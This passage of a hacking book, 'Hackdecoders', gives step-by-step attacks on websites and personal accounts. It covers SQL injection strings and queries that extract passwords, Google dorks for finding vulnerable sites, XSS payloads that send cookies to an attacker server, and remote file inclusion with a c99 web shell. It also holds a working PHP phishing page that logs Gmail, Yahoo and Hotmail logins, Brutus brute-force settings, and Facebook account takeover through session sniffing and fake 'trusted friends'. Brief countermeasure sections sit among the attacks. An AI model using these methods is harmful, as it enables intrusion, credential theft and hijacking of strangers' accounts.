Page 53: Hackdecoders- Book by Hitesh Malviya

Chapter 7 SQL Injection & Countermeasures

Objectives:

Some string used to perform SQL Injection Some Google dorks to find vulnerable login portals How to hack website using sql vulnerable strings Error based SQL Injection Blind SQL Injection Google dorks to find sql injection vulnerable websites Automated tools SQL Injection countermeasures

www.brtr

icks.c

om

Page 54: Hackdecoders- Book by Hitesh Malviya

SQL Injection is the method used for bypassing user authentication of anywebform(Login portals).An attacker gives a malicious string input to the webform whichtakes the user to the admin area of websites. An attacker can add, delete files and playwith website contents after gaining access to the admin area.

Some Strings used to perform SQL injection

' or 1=1--' or ‘=’' or 'a'='ahi' or 1=1 --' or 1=--

Some Google Dorks to find vulnerable login portals

/admin/adminlogon.asp/admin/admin_login.asp/admin/admin_logon.asp/administrator/admin.asp/administrator/login.asp

How to hack website using SQL Vulnerable strings

Find any vulnerable login portal using Mentioned google dorks. Give any sql string as input to both username and password field. You can check all strings until get succeed to gain access into admin area.

www.brtr

icks.c

om

Page 55: Hackdecoders- Book by Hitesh Malviya

Error Based SQL Injection

1). Check for vulnerability

let’s say that we have some site like thishttp://www.site.com/news.php?id=1Now to test if is vulnerable we add to the end of URL ' (quote),and that would be http://www.site.com/news.php?id=1'If it is vulnerable you should get an SQL error such as

"Sorry: You have an error in your SQL syntax; check the manual that correspondsto your MySQL server version for the right syntax to use near '\'' at line 1”or something like that.

2). Find the number of columns

To find number of columns we use statement ORDER BY.This function tells the SQL database how to order the result.We use this to find how many tables are there. You need to type order by 1/*(or 1--) andkeep adding one until you get an error.

Example:http://www.site.com/news.php?id=1 order by 1/* <-- no errorhttp://www.site.com/news.php?id=1 order by 2/* <-- no errorhttp://www.site.com/news.php?id=1 order by 3/* <-- no errorhttp://www.site.com/news.php?id=1 order by 4/* <-- An errorThis means there are only 3 tables because we got an error after order by 3

3). Check for UNION function

The UNION function shows data from the selected tables or columns etc.

Example:http://www.site.com/news.php?id=1 union all select 1,2,3/* or 3-- (We know there are3 tables).If you see numbers on the page then the UNION function is working. Try – in place of /*if the query doesn’t give any result.

www.brtr

icks.c

om

Page 56: Hackdecoders- Book by Hitesh Malviya

4). Check for MySQL version

If you get, say number one, then this is where we insert the @@version or version().(@@version or version() represent the version of the database)

Example:http://www.site.com/news.php?id=1 union all select @@version,2,3/*

You may get "Illegal mix of collations (IMPLICIT+ COERCIBLE) kind of errors. If youget any error while using above query then you must need to convert the statement usingthe convert() function.

Example:http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*

5). Getting table and column name

If the MySQL version is < 5 (i.e 4.1.33, 4.1.12...).We need to guess table names in most of cases. You can guess some table namesfrom listed below: user,admin,member,username,user,usr,user_name,password,pass,passwd,pwd etc.

Example:http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/*

If we see any number,it can be 1 or 2 or 3, and then it concludes that table name adminexists in database.

Now check Column names.

Example(find username):http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/*If you get an error the column doesn't exist.

If it works you will get a username displayed on the page, example would be admin, orsuperadmin etc.

Example(finding password):http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/*If you get an error the column doesn't exist.

If it worked, you will see a password on the page in hash format or in plain-text format.Join all strings using the concat() function. The concat() function joins all strings relatedto your query.

www.brtr

icks.c

om

Page 57: Hackdecoders- Book by Hitesh Malviya

Example:http://www.site.com/news.php?id=1 union all select1,concat(username,0x3a,password),3 from admin/*

(0x3a is Hex for a .You could also use an ASCII value for the colon. Using ASCII Table.If it worked you will see all usernames and passwords in order like so:username:password

Some admin change the column name but you can use mysql.user instead.

Example:http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3from mysql.user/*

If the MySQL version is =>5

Find Table name

We use table_name and information_schema.tables. for this purpose.

Example:http://www.site.com/news.php?id=1 union all select 1,table_name,3 frominformation_schema.tables/*

Here we replace the our number 2 with table_name to get the first table frominformation_schema.tables

If we couldn’t find any result then we need to add LIMIT to the end of query to list outall tables.

Example:http://www.site.com/news.php?id=1 union all select 1,table_name,3 frominformation_schema.tables limit 0,1/*

We can change limit 0,1 to limit 1,1. To view the 2nd table.

Example:http://www.site.com/news.php?id=1 union all select 1,table_name,3 frominformation_schema.tables limit 1,1/*

the second table will be displayed. We should have to put limit 2,1to get 3rd table.

Example:http://www.site.com/news.php?id=1 union all select 1,table_name,3 frominformation_schema.tables limit 2,1/*

www.brtr

icks.c

om

Page 58: Hackdecoders- Book by Hitesh Malviya

We need to add one until we will get some useful like db_admin, poll_user, auth,auth_user etc.

Find Column names:

Here we use column_name and information_schema.columns

Example:http://www.site.com/news.php?id=1 union all select 1,column_name,3 frominformation_schema.columns limit 0,1/*

the first column will be displayed.

Example:http://www.site.com/news.php?id=1 union all select 1,column_name,3 frominformation_schema.tables limit 1,1/*

The second table will be displayed. We need to put limit 0,1 to get 3rd table.

Example(Finding Password):http://www.site.com/news.php?id=1 union all select1,concat(user,0x3a,pass,0x3a,email) from users/*

You will get into in this format user:password(or hash):emailexample: admin:hash:[email protected]

Blind SQL Injection

1). Check for vulnerability

Let's say that we have some site like thishttp://www.site.com/news.php?id=1Now to test if is vulnerable we add to the end of URL ( and 1=1 which is false) If it takessome changes in webpage then the website is vulnerable to Blind Sql Injection.

2) Check for MySQL version

We use substrings to get the MySQL version.

Example:http://www.site.com/news.php?id=1 and substring(@@version,1,1)=4

www.brtr

icks.c

om

Page 59: Hackdecoders- Book by Hitesh Malviya

This should return true if the version is 4, Replace 5 with 4 then if query return TRUEthen the version is 5. If any case select doesn’t work then we can use subselect.

2) Find table names

You need to guess for table and columns names.

Example:http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

With limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,this is very important.If the page loads normally without content missing, the table user exists. If we getFALSE (some article missing), we need to change table name until we guess the rightone.

3) Find column names

As same before we have to guess column name.Example:http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1)from users limit 0,1)=1

Here we merge 1 with the column password, then substring returns the first character(1,1)

4) Extract data from database

We need to pull character to find column data.http://www.site.com/news.php?id=1and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>80

This here extracts the first character from first user in table users. Substring here returnsfirst character and 1 character in length. ASCII() converts that 1 character into ASCIIvalue and then compare it with symbol greater then > .So if the ASCII char greater then 80, the page loads normally. (TRUE)we keep trying until we get false.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>99Here we get false.So the first character in username is char(99). Using the ASCII converter we know thatchar(99) is letter 'c' then let's check the second character.

www.brtr

icks.c

om

Page 60: Hackdecoders- Book by Hitesh Malviya

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that we had changed ,1,1 to ,2,1 to get the second character.Now it returns thesecond character, 1 character in length.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECTconcat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

We know that the second character is char(105) and that is 'i'. We have 'ci' so farso we need to keep incrementing until we get the end. (When >0 returns false we knowthat we have reach the end).

Blind SQL Injection is a very time consuming method. We can use automated tools toperform Blind sql injection. Sqlmap is one of best tool used for this purpose.

Google Dorks to find SQL Injection vulnerable website

Here are some google dorks given below, you can use it to find sql vulnerable websites.

inurl:index.php?id=

inurl:trainers.php?id=

www.brtr

icks.c

om

Page 61: Hackdecoders- Book by Hitesh Malviya

inurl:buy.php?category=

inurl:article.php?id=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

You can get the full list from: http://www.invisblenandu.com/2011/04/5000-sql-dorks.html

Automated Tools

Sql injection vulnerability scanners and sql injection exploiters are used to performpenetration testing for sql injection vulnerability in web applications.

Sql Injection Vulnerability scanners

Scrawlr: it crawls a website while simultaneously analyzing the parameters of eachindividual web page for SQL Injection vulnerabilities.

www.brtr

icks.c

om

Page 62: Hackdecoders- Book by Hitesh Malviya

Download Link:http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx

Webcruiser: It crawls the website for sql injection vulnerabilities,X-Path and XSSVulnerabilities.

Download Link: http://sec4app.com/

www.brtr

icks.c

om

Page 63: Hackdecoders- Book by Hitesh Malviya

Sql Injection Exploitation Tools

Havij: Havij is an automated SQL Injection tool that helps penetration testers to find andexploit SQL Injection vulnerabilities on a web page.

Download Link: http://itsecteam.com/en/projects/project1_page2.htm

Sqlmap: SQL scanner capable of enumerating entire remote databases, and performs anactive database fingerprinting.

www.brtr

icks.c

om

Page 64: Hackdecoders- Book by Hitesh Malviya

Download Link: sqlmap.sourceforge.net/

Bobcat: It is based on a tool named "Data Thief" that was published as PoC byappsecinc. BobCat can exploit SQL injection bugs/opportunities in web application.

Download Link: www.securiteam.com/tools/5HP011FHPO.html

SQL Inject Me: SQL Inject Me is the Exploit-Me tool used to test for SQL Injectionvulnerabilities. The tool works by submitting your HTML forms and substituting theform value.

www.brtr

icks.c

om

Page 65: Hackdecoders- Book by Hitesh Malviya

Download Link:https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me

SQL Injection Countermeasures

SQL injection is kind a complex vulnerability and usually applying a fix will differ onwhich type of application you are developing. By the way instead of its complexity anddifferent types of injection methods SQL injection is one of the easiest to counter.Following are some measures that can be used against SQL injection attack.

1. As told earlier SQL injection attacks occurs due to non-sanitized input. So our firststep would be sanitizing input. At developer level build application which explicitlyescapes single quotes and apostrophe, do not validate input of expression type forexample, 1 + 1, x+ y etc. By sanitizing input by above method you'll be able to stop SQLinjection since application will not accept malicious input.

2. The second solution at developer level is to use Application Programming Interface(API's) which disallow SQL injection. Today nearly every web application developmenttool has an API which handles SQL queries all by its own, its better to use them because

www.brtr

icks.c

om

Page 66: Hackdecoders- Book by Hitesh Malviya

they not only reduce overall development overhead but also provide protection againstSQL injection.

3. At system level allow application to run at possible lower privileges, with which it canrun flawlessly. There's no need to grant application more privileges than required. Itmight take little time to apply this but doing so will disallow hacker to retrieve sensitivedata from your database since privileges will be limited.

4. Lastly remove unnecessary database packages from your system since they don't onlytake extra memory and disk space but if any of them is vulnerable your database willbecome vulnerable too.

Depending upon what kind of application you are developing some or moremodifications may need while development to avoid injection. But at practical levelabove countermeasures can surely be applied to any kind of web application to ensureprotection against SQL injection.

www.brtr

icks.c

om

Page 67: Hackdecoders- Book by Hitesh Malviya

Chapter 8 Cross site scripting attack& countermeasures

Objectives:

Types of XSS How to find XSS Vulnerability Basic Injection codes Advanced Injection codes Google Dorks to find search boxes on websites XSS Vulnerability scanners XSS Exploitation automated tools

www.brtr

icks.c

om

Page 68: Hackdecoders- Book by Hitesh Malviya

XSS vulnerability is one of common vulnerability found in many web applications. Anattacker can exploit this vulnerability to get cookies of session on any web application.By analyzing these cookies an attacker can get login information of users on the webapplication.XSS is basically a client side attack. An attacker can add his own contents tothe webpage by exploiting XSS Vulnerability at the client side.

Types of XSS

There are actually three types of Cross site scripting, commonly known as: DOM Based Persistent Non-Persistent

DOM Based www.brtr

icks.c

om

Page 69: Hackdecoders- Book by Hitesh Malviya

An attacker can attack victim web page as well as victim local machine by exploiting thisvulnerability. An attacker can set up a malicious html web page to the victim machine.The vulnerable page can be easily executed by sending command to victim machine. Anattacker can easily gain control to the victim machine by using user privileges.

Persistent

In persistent XSS vulnerability, an attacker doesn’t need to pass crafted url throughsearch box. Webpage itself permits attacker to insert fixed data to the form field. Dataprovided by attacker on webpage lead to changes in webpage appearance. Guestbook isthe example of this kind of vulnerabilities.

Non-Persistentwww.brtr

icks.c

om

Page 70: Hackdecoders- Book by Hitesh Malviya

It is the most commonly found vulnerabilities found on net. It’s commonly named asNon-persistent because it works on an immediate HTTP response from the victimwebsite. An attacker writes some arbitrary html codes to the search boxes of website andit will return the results of this html entities.

How to find XSS Vulnerability

We need to find search box, shout box, guestbook or any web form for exploitingXSS.We can find these by using any Google dork inurl:search.php?q=.We can exploitvulnerable webpage using injection codes.

Basic Injection Codes

http://website.com/search.php?q=<script>alert("Hindustan Cyber force”)</script>

http://website.com/search.php?q=<br><br><b><u>Hindustan cyber force</u></b>

http://website.com/search.php?q=<html><body><IMGSRC="http://website.com/IMAGE.png"></body></html>

http://website.com/search.php?q=<html><body><h1><b>Hindustan cyberforce</b></h1></html>

Advance Injection Codes

Cookie stealing

We have to download a cookie logger script before proceeding next step. We can getcookie logger script fromhttp://www.ziddu.com/download/13227521/cookiestealer.zip.html after downloadingthe file we have to upload the cookie logger to any web hosting server for example(110mb.com).We have to create the file “log.txt” and chmod to 777,Now we have to findany XSS vulnerable website and have to inject following code into the search box.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location ="http://yourServer.com/cookielogger.php?c="+document.cookie

www.brtr

icks.c

om

Page 71: Hackdecoders- Book by Hitesh Malviya

Now when user visits the page that got injected too, they will be sent to the website andcookie will be stolen, the second one is more stealth our file now or cookies then we canhijack there session.

How to find Persistant XSS vulnerable websites

We need to find guestbooks which allowed arbitrary html codes by user.Google Dork: “html enabled” guestbook

It will list all search results which consists html enabled guestbooks. We can addarbitrary html codes and submit to server. Attacker can add images, flash videos,hyperlinks on guestbook by using allowed html tags, this is known as html injection.

Google Dorks to find Search boxes on website

Inurl:search.php?p=Inurl:search.php?name=Inurl:search.php?q=Inurl:search.php?m=

Download the full list of all Google dorks from the given link below:-http://pastebin.com/5RukrgTc

XSS Vulnerability scanners

Standard web applications scanners like w3af, acunetix, IBM rational webscan scanswebsite for xss vulnerability.

Download Link for w3af: http://sourceforge.net/projects/w3af/Download Link for acunetix: http://www.acunetix.com/vulnerability-scanner/download.htmDownload Link for IBM Rational webscan:http://www.ibm.com/developerworks/downloads/r/appscan/

www.brtr

icks.c

om

Page 72: Hackdecoders- Book by Hitesh Malviya

XSS Exploitation Automated tools

Xsser is tool used for exploit xss vulnerability on any webapplication.

We can also use firefox add-on xss me for the same purpose, it provides number ofexploitation codes for exploiting xss vulnerability on webapplication.

www.brtr

icks.c

om

Page 73: Hackdecoders- Book by Hitesh Malviya

Chapter 9 Remote file inclusion& Countermeasures

Objectives:

Google dork to find vulnerable websites How to identify vulnerability in website How to exploit the vulnerability Vulnerbility scanners Exploitation tools Countermeasures

www.brtr

icks.c

om

Page 74: Hackdecoders- Book by Hitesh Malviya

Remote file inclusion is a type of vulnerability often found on php websites. It allowsattacker to include a remote file, usually through a script on the web server. Thevulnerability occurs due to improper validation of user supplied inputs.

Google dorks to find vulnerable websites

Inurl:home.php?page=Inurl:index.php?page=Inurl:view.php?page=Inurl:contact.php?name=

Visit the link given below for full list. http://www.alboraaq.com/forum/abh50250/

How to identify vulnerability in website

First of all, We have to Select any search result generated by any google dork then Putwww.google.com after “=” if the google search engine will be shown below on thewebpage then, it concludes “I am Vulnerable, Hack me”

www.brtr

icks.c

om

Page 75: Hackdecoders- Book by Hitesh Malviya

Example:www.site.com/contact.php?name=www.google.com/

How to exploit the Vulnerability

Once you found, the vulnerable website then Upload c99 shell to any free webhostingservice (I prefer www.my3gb.com). We can download c99 shell fromwww.hcf.co.in/downloads.After uploading the c99 shell to the server get the shell link (for eg. We have shell linkaddress is www.my3gb.com/name.php) and put the shell url after “=” It will redirect thewebpage to the c99 shell. Once you have redirected the website to c99 shell then “Thewebsite will be all yours”.www.b

rtrick

s.com

Page 76: Hackdecoders- Book by Hitesh Malviya

Example:www.site.com/contact.php?name=www.my3gb.com/name.php

Vulnerabilty Scanners

(1)Fimap

fimap is a little python tool which can find, prepare, audit, exploit and even googleautomatically for local and rfi bugs in webapps. fimap is similar to sqlmap just forLFI/RFI bugs instead of sql injection. It is currently under heavy development but it’susable.

Features

Check a Single URL, List of URLs, or Google results fully automatically. Can identify and exploit file inclusion bugs. Test and exploit multiple bugs.

Download Link: http://code.google.com/p/fimap/

(2)Uniscan

Uniscan is remote code execution & rfi vulnerability scanner used for scanning ofwebapplications for rfi/lfi bugs.

Download Link: http://sourceforge.net/projects/uniscan/files/latest/download

Exploitation Tools:

Fimap is also used for exploitation of rfi/lfi bugs in any webapplication.It first scanswebapp for bugs then exploit it.

Download Link: http://code.google.com/p/fimap/

www.brtr

icks.c

om

Page 77: Hackdecoders- Book by Hitesh Malviya

Countermeasures:

If you are developing any webapplication:

(1)use proper input validation.(2)proper sanitizing of input value.(3)update your webapplication with security updates(4)Disable allow_url_fopen and allow_url_include in php.ini.(5)Keep your support lists private-it may leak the information about reportedvulnerability to outside user.

www.brtr

icks.c

om

Page 78: Hackdecoders- Book by Hitesh Malviya

Chapter 10 Email account Hacking& security

Objectives:

Vulnerabilities in email services Techniques used in Email hacking Email account security measures Password recovery tools

www.brtr

icks.c

om

Page 79: Hackdecoders- Book by Hitesh Malviya

An Email address is the address given by email service provider to user for transportingof message between two users. Email service is widely used service by companies andindividuals, All the communications has been taken place through email accounts only, Ifsomeone get access to your email account then confidential information can be sent tounsafe hands, that must be harmful for the victim. Yahoo, Gmail & Hotmail are mostlyusing email services. IMAP & POP3 are the protocols used in services. We will discussabout Hacking & security of these email accounts in next some pages.

Vulnerabilities in email services

While using web based email services, after clicking a link present in the email body,ittransfers from url of current page(webmail url) to the next page(link present).This info istransmitted through third party web servers,It can include:

Email address Login ID Actual Name

www.brtr

icks.c

om

Page 80: Hackdecoders- Book by Hitesh Malviya

Techniques used in email Hacking

There are 4 techniques used for email account hacking.(1)By answering security question & Social Engineering(2)By stealing cookies from victim’s web browser.(3)By Phising(4)By password Bruteforcing

(1)By answering security question & Social Engineering

Security question set up by user while creating email account. It is used to recover lostpassword. Once we correctly answer the security question set by user then we can requestfor new password from server. Now we can access to the victim inbox by using newpassword.

Social Engineering is an art of manipulation to retrieve confidential information from anyhuman. If the victim user closes to us then we can easily find out correct answer ofquestion by using very less effort. If we don’t know the user then we have to make someextra effort but If you are perfect in mind game then no one can beat you, There is nosecurity tool developed which protect from social engineering attack.

For Gmail

Recovery page URL: https://www.google.com/accounts/recovery .

For Yahoo

Recovery page URL: https://edit.india.yahoo.com/forgot

www.brtr

icks.c

om

Page 81: Hackdecoders- Book by Hitesh Malviya

For Hotmail

Recovery page URL: https://account.live.com/ResetPassword.aspx

(2)By stealing cookie from users web browser

Web browser stored user authentication information in encrypted form known as cookie.When the victim user access to email account on web browser then it stores encryptedinformation of each login in form of cookie (when cookie is enable to the victim’sbrowser). If we can get access to the victim’s browser cookies then we may hack hisemail accounts. We use cookie stealer for the same purpose. Cookie stealer is a scriptwritten in php.

How the Hack Begins?

This technique works for each and every email services. We have to download a cookielogger script before proceeding next step. We can get cookie logger script fromhttp://www.ziddu.com/download/13227521/cookiestealer.zip.html after downloadingthe file upload the cookie stealer to any web hosting server forexample(110mb.com).Create the file “log.txt” and chmod to 777,then send the cookiestealer url ,for example: www.110mb.com/hmalviya9/cookie.php) to the victim user, Itwill captures all the cookies from the victim’s browser when he clicks on link.

(3)By Phising

This technique also works for all email services. Phising is process of making clone pageof any webpage. Clone page is called phiser. We have to create clone page for email

www.brtr

icks.c

om

Page 82: Hackdecoders- Book by Hitesh Malviya

login page then send it to victim. Once the victim will login through the phiserpage,Login authentication information will be sent to the attacker. An Attacker manage tosend clone page to victim by using social engineering techniques.

How to make clone of email account login

Clone page is also known as hoax. First of all Go to desired email account login page.For Gmail -> https://www.gmail.com/login

Yahoo -> https://www.login.yahoo.comHotmail -> https://www.login.live.com

Save the page as html and in notepad then go ->view->find and put action=” in finddialog box.

For Gmail -> Replace action=”https://www.gmail.com/login” with action=”next.php”For Yahoo -> Replace action=”https://www.login.yahoo.com with action=”next.php”For Hotmail -> Replace action=”https://www.login.live.com with action=”next.php”

Change the method to GET instead of POST then save it as index.php

Coding of next.php

<?phpheader("Location: https://www.gmail.com/login "); #For Gmailheader("Location: https://www.login.yahoo.com "); #For Yahooheader("Location: https://www.login.live.in "); #For Hotmail$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Make a blank text file and save it as passwords.txt. Now we have to uploadindex.php,next.php and passwords.txt to any free server hosting website Iprefer(my3gb.com). Here index.php is our clone page we have to send this page to thevictim, Once the victim will login through the hoax page, Login information will beautomatically sent to passwords.txt . Suppose our clone page address ismy3gb.com/malviya/index.php then we have to send this page to victim in order to

www.brtr

icks.c

om

Page 83: Hackdecoders- Book by Hitesh Malviya

hacking of email account. Use some social engineering techniques for making the hackeffort more effective.

Defense against phising attack

Download netcraft antiphising toolbar to your browser from http://toolbar.netcraft.com/For defending against phising scam.

(4)By Password Bruteforcing

We can crack password of yahoo email account by using wordlist & bruteforcing method.Gmail & Hotmail account can’t be brutforced. We use Brutus tool for bruteforcing ofyahoo email account passwords.

Brutus Download:http://www.hoobie.net/brutus/brutus-download.html - Official Download

We can put brutus and run it from a flash drive, it is a portable program and requiresnothing to be ran. It can also be ran under WineHQ on linux (I have personally tested).

Open up Brutus and configure it as is:

The following settings must be set up:

www.brtr

icks.c

om

Page 84: Hackdecoders- Book by Hitesh Malviya

*Target : pop3.yahoo.com*Attack Type : Pop3*Connections : 60 (all the way)*Timeout : 60 (all the way)*Try to stay connected all the way*Single User (put the email to attack here)*I would suggest using a proxy (google, there normally in IP:PORT Format)

If you don't already have a good wordlist, you can grab mine from here:http://www.ziddu.com/download/8565751/PasswordDictionary.zip.html

Basically it will just attempt every password in the dictionary tell it finds the rightpassword.

If the dictionary attack fails, we can also attempt a Brute Force attack (also called acryptanalysis attack) where it goes through and guesses every possible stringcombination.

#Gmail account password can’t be bruteforced because it uses captcha system at the timeof authentication process.

Email Account Security Measures

(1)Best way to protect an email account from hacker is to use strong passwords. A strongpassword contains upper case,lower case,numbers & alphanumeric numbers. Setpassword by using “Mary had a little lamb. The lamb had white fleece.”

Consider the first letter of each word; Eg.- MHALLTLHWF Put every second letter of abbreviation in lower case Replace “A” with “@” & “L” with “!” thus then a new password is formed

which contains more then 8 characters. New Password: Mh@!Lt!hWf

(2)Use sign-in seal(for yahoo users),Sign-in seal protect users from phising scam.

(3)Set an alternate email address during signup,Lost password can be recovered toalternate email address.

(4)Set you mobile number during signup , It helps us to recover our account.

(5)Never select the option “keep me signed in” or “remember me” at time of login,If youselect this option,next time it will automatically open your account on the samecomputer.

www.brtr

icks.c

om

Page 85: Hackdecoders- Book by Hitesh Malviya

(6)Use email security tools (Email protector,SuperSecret).

Download Link for Email protector: http://www.softpedia.com/get/Internet/E-mail/Mail-Utilities/Email-Protector.shtmlDownload Link for SuperSecret: http://download.cnet.com/SuperSecret/3000-18501_4-91956.html

Password Recovery Tools

Mail Pass View: It is small recovery tool that reveals passwords and other accountdetails for Yahoo, Gmail, Hotmail, outlook etc. email clients.

Download Link: http://majorgeeks.com/Mail_PassView_d3860.html

Mail Password: Mail Password is universal password recovery tool for POP3 Emailaccounts.Download Link: http://download.cnet.com/Email-Password-Recovery-Master/3000-18501_4-10641123.html

Password revelear javascript: This javascript is used to reveal login information hidebehind astriks (*****), We just have to put the Script on the address bar, It will revealspassword hide behind astriks within a minute.

Code: javascript: alert(document.getElementById('Passwd').value);

www.brtr

icks.c

om

Page 86: Hackdecoders- Book by Hitesh Malviya

Chapter 11 Facebook account hacking& security

Objectives:

Facebook account hacking using wireshark Facebook account hacking using firesheep Facebook account hacking using recovery options Facebook account security countermeasures

www.brtr

icks.c

om

Page 87: Hackdecoders- Book by Hitesh Malviya

Facebook is one of the most widely used social networking website with more than 750million users, which is the reason behind becoming hot target of all hackers.

How to hack anyone facebook account when both victim and attackerare using same network?

(1)Using Wireshark

First of all I must clear you even though you'll get access to victim's account you'll notget his/her password, next this trick will work only on LAN with hub.

For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox webbrowser and add n edit add-on for Mozilla Firefox. Now I assume you have all abovecomponents for hacking facebook and you are connected in a hub based LAN or LAN

www.brtr

icks.c

om

Page 88: Hackdecoders- Book by Hitesh Malviya

which has been ARP poisoned. So now click on capture button and start capturingpackets.

Now using command line shell ping www.facebook.com you want to hack to get its IPaddress, filter all IP packets having IP address of www.facebook.com and search forHTTP protocol followed by GET /home.php, this may vary depending on region andtime/zone but don't bother try to search all packets with HTTP GET for cookies.

Now from packet details window expand the packet information for above packet andyou'll get 8-10 different cookies that are stored by www.gmail.com on victim's PC. Rightclick and copy all cookies names and values in notepad.

Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie toyour cookie folder using Cookie editor.

Now close Cookie editor and open gmail, you'll find yourself logged into the victimsaccount.

Defense against this attack:

A system administrator should use tools used for countering sniffing.Don't log-in into your accounts if you know your LAN is not protected and if you want tolog-in better use a tunneled connection.

Download Wireshark from http://www.wireshark.org/.Download Add N Edit Cookies from Add-Ons Mozzila

(2) using Firesheep www.brtr

icks.c

om

Page 89: Hackdecoders- Book by Hitesh Malviya

Fire sheep is an extension developed by Eric Butler for the Firefox web browser. Theextension uses a packet sniffer to intercept unencrypted cookies from certain websites(such as Facebook and Twitter) as the cookies are transmitted over networks, exploitingsession hijacking vulnerabilities. It shows the discovered identities on a sidebar displayedin the browser, and allows the user to instantly take on the log-in credentials of the userby double-clicking on the victim's name

Thing we need:

1. Firefox Browser

2. Fire sheep Firefox plugin

Procedure:

1. First download and install Firefox browser and Fire sheep add on

2. Open Firefox , Now click the (1) view button then select (2) side bar finally click(3)fire sheep or simply press ( ctrl + shift +s ) to open fire sheep

3. Now you can see fire sheep has opened up in the side bar Now select your interface bygoing to preferences as shown

4. Now click on start capture button and wait for a while ,

5. Now you can see different pre- authenticated sessions on the side bar select the sessionwhich you want .

6. Now you will be automatically logged in the victims account .You can use this tool tohack Facebook/Twitter accounts

How to hack anyone facebook account when both victim andattacker are using different network?

Phising, Cookie stealing can work this time as I discussed before in email hackingsection.(see page no.

www.brtr

icks.c

om

Page 90: Hackdecoders- Book by Hitesh Malviya

Hacking Facebook account password using recovery option

Facebook has introduced a feature of using “Recovering password using TrustedFriends”. In this feature, if we have lost our Facebook account password, Facebook willsend the security code to 3 friends. We have to ask those 3 friends for the security codesand after entering them, we can reset Facebook password.

So, in this hack, we will use this feature for hacking Facebook account password. So, youhave to create 3 fake accounts and make sure that your victim adds them as his friends.So, your 3 fake accounts must be listed in your victim’s Friends list. Now, if we use theabove “Trusted friends” feature for resetting victim’s Facebook password, Facebook willsend the security code to our 3 fake accounts and we can easily hack Facebook account.You can use Social engineering skills so that your victim will have no doubt whileaccepting your fake account as his friend. This is the only tricky part of the hack.

Also, the fake accounts must be at least a week old. Once you are done with fakeaccounts, move to the steps below.Step 1.

Go to Facebook.com and hit on Forgot Password link to get this page:

Step 2.

You have to enter the email of the victim, or even the Facebook profile name will do.Facebook will search for profile name and you will be shown the account. Hit on “This ismy account”

www.brtr

icks.c

om

Page 91: Hackdecoders- Book by Hitesh Malviya

Step 3.

On the next page, hit on “No longer have access to these”.

Step 4.

You will be prompted for email address. Enter your email address here and hit on“Submit”.

Step 5.

Facebook will ask you ask you to answer the Security question. Use social engineering tofind out correct answer of question or else you can go for next steps by entering three

www.brtr

icks.c

om

Page 92: Hackdecoders- Book by Hitesh Malviya

wrong answer ( Its not necessary you will prompt to next step of recovery because itdepends on account to accounts )

Step 6.

Now if you will able to proceed into next step recovery through three friends. Here youhave to select three friends from random lost generated by facebook. It is not necessarythat you fake accounts will be there in the list but possibilities are always there.

Now we have to get codes from all three accounts which have selected during recoveryprocess after getting code we can set new password. Email address change mail will besent to the old associated email id of victim. The account will be locked out for 24 hours.Now it’s attacker duty to get access before victim otherwise victim can recover hisaccount.# Victim can be easily recover his account by answering security question. Once youhave set security question it cant be changed.

www.brtr

icks.c

om

Page 93: Hackdecoders- Book by Hitesh Malviya

Facebook account security countermeasures

Enable HTTPS protocol

Using HTTPS instead of simple HTTP means that you are securing your communicationbetween the server and your computer. No one will be able to hack between yourcomputer and the server so you can be sure that all the information delivered to and fromyour computer is completely safe. Modern browsers can highlight the secure URLs withthe information about the certificate issuing authority. Here is a screenshot of secureFacebook open in Firefox:

To enable HTTPS, you can login to your Facebook account and go to “Account ->Account Settings“.Select Account Security under Settings tab and check the box beside Browse Facebookon a secure connection (https) whenever possible

Use Facebook two-steps authentication (Login approvals)

Like Google, Facebook has also introduced two-step authentication service called LoginApprovals. This service lets you login to your Facebook account by using your passwordplus a security authentication code sent to your mobile device. By enabling this service,you will no longer be able to login to Facebook by only using your password. You willalways be required to use the password and security code sent to your mobile device.

Checking for facebook email phising attack and scams

While you are in Facebook, you should never click on suspicious links even if the

messages were sent from your friends. Most Facebook scams spread by posting messages

to walls of all friends of the infected user. The best place to get updated news about

Facebook scams is Facecrooks.com.

Enable Login notifications

Enabling login notifications in Facebook will notify you when someone logs in from a

suspicious location or computer.

To enable login notification, go to “Account -> Account Settings“.Under settings tab expand “Account security -> Login notification“, check the following

two boxes:

www.brtr

icks.c

om

Page 94: Hackdecoders- Book by Hitesh Malviya

Send me an email

Send me a text message

Use Facebook one time password service

Like Hotmail, Facebook also provides the facility of one-time password. One-time

password is a temporary password which can only be used once and expires within 20

minutes of creation. To enable this service, you’ll need to activate a phone number so thatFacebook can send messages to your mobile. To register and activate a phone number

you can go to “Account -> Account settings”.

www.brtr

icks.c
